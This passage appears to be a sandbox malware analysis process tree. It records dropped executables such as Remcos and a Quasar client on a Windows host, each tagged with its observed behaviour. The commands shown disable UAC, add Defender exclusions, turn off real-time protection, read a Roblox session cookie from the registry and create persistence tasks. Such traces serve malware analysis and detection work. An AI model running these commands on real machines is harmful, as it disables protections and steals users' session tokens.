                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2384
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                5⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4016
                                                                                                                                • C:\ProgramData\Remcos\remcos.exe
                                                                                                                                  C:\ProgramData\Remcos\remcos.exe
                                                                                                                                  6⤵
                                                                                                                                  • Adds policy Run key to start application
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:5104
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                    7⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5228
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      8⤵
                                                                                                                                        PID:5336
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                        8⤵
                                                                                                                                        • UAC bypass
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Modifies registry key
                                                                                                                                        PID:2892
                                                                                                                                    • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                                                                                      "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:4260
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
                                                                                                                                3⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                PID:4668
                                                                                                                                • C:\Windows\System32\certutil.exe
                                                                                                                                  "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp8104.tmp"
                                                                                                                                  4⤵
                                                                                                                                    PID:5292
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5640
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:3508
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  PID:2824
                                                                                                                                  • C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                    "C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5768
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\888.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\888.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2152
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:3180
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\50to.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:4372
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\info.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\info.exe"
                                                                                                                                  3⤵
                                                                                                                                    PID:5624
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
                                                                                                                                      4⤵
                                                                                                                                        PID:2900
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:412
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
                                                                                                                                          4⤵
                                                                                                                                            PID:4108
                                                                                                                                            • C:\Windows\SysWOW64\regedit.exe
                                                                                                                                              regedit /s "C:\Windows\SysWOW64\ruts\11.reg
                                                                                                                                              5⤵
                                                                                                                                              • Runs .reg file with regedit
                                                                                                                                              PID:4044
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
                                                                                                                                            4⤵
                                                                                                                                              PID:4964
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
                                                                                                                                                5⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:3200
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
                                                                                                                                              4⤵
                                                                                                                                                PID:2648
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:7808
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c delete.bat
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1896
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\50.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\50.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1104
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\SH.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5892
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4724
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1732
                                                                                                                                                          • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                            PID:4976
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
                                                                                                                                                            4⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:3420
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                            4⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:6308
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                            4⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:4296
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6432
                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                              "wmic.exe" os get Caption
                                                                                                                                                              4⤵
                                                                                                                                                                PID:8108
                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6160
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5292
                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:6284
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\XW.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4388
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:7420
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:4036
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:3708
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:6732
                                                                                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:7872
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6020
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5980
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:2612
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:940
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:7152
                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                          PID:6232
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2348
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 1304
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5664
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6240
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6540
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6996
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7268
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:7368
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:7572
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:8024
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:7332
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 1200
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5296
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1696
                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                              msiexec /i vcredist.msi
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Event Triggered Execution: Installer Packages
                                                                                                                                                                                              PID:7840
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\jy.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5960
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-K48KG.tmp\jy.tmp
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-K48KG.tmp\jy.tmp" /SL5="$801FC,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:8140
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\test30.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6672
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:6360
                                                                                                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                      "schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:7048
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:6860
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                          "schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:6184
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WUviXiYV9Nab.bat" "
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:2040
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2760
                                                                                                                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                            "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:7524
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2100
                                                                                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                              "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                              PID:7136
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5384
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8rMGYVCuBZ7G.bat" "
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:5132
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:7364
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:6024
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:3700
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:1896
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:5280
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\10000520110\123719821238.dll, Main
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:3164
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:5200
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:7248
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3896
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3632
                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3832
                                                                                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4048
                                                                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4228
                                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4684
                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4864
                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:472
                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:1752
                                                                                                                                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:3680
                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3964
                                                                                                                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4788
                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:2820
                                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1892
